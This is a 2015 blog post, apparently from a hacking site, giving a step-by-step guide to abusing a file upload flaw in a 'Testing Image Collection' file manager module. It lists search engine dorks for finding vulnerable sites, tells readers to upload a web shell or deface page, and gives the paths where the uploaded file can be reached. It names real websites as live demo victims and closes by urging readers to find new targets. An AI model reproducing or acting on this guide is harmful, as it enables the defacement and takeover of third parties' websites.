Announcement: This Website is For sale, if you're intrested, Please contact US

Monday, 28 September 2015

"Testing Image collection" shell and files upload vulnrablity

Posted by   on

"Testing Image collection" shell and files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
           intitle:"Testing Image Collections"
Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections" 
now see search results in google or bing search ..
select any site from search results and look for upload option 
here is demo of upload button : 
image_2326254.original.jpg (374×39)
Now select your shell or deface page and upload it
To view your upload shell or deface go to:
http://website.com/files/yourfilehere  or
http://websites.com/path/yourfilehere
Live Demo :
http://www.bantamorloff.co.uk/modules/filemanagermodule/actions/picker.php?id=&highlight_file=472
result :  http://www.bantamorloff.co.uk/files/backlinks.html
other live examples : 

http://www.admiralfc.co.uk/modules/filemanagermodule/actions/picker.php?id=0 
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0 
*UPDATE : Demo sites are patched now Find a new target >:D<

4 comments:
Write comments
  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. This comment has been removed by a blog administrator.

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. This comment has been removed by a blog administrator.

    ReplyDelete

Get Updates about Latest Hacks, Exploits, Applications and Softwares. http://www.devilscafe.in/
Join Our Newsletter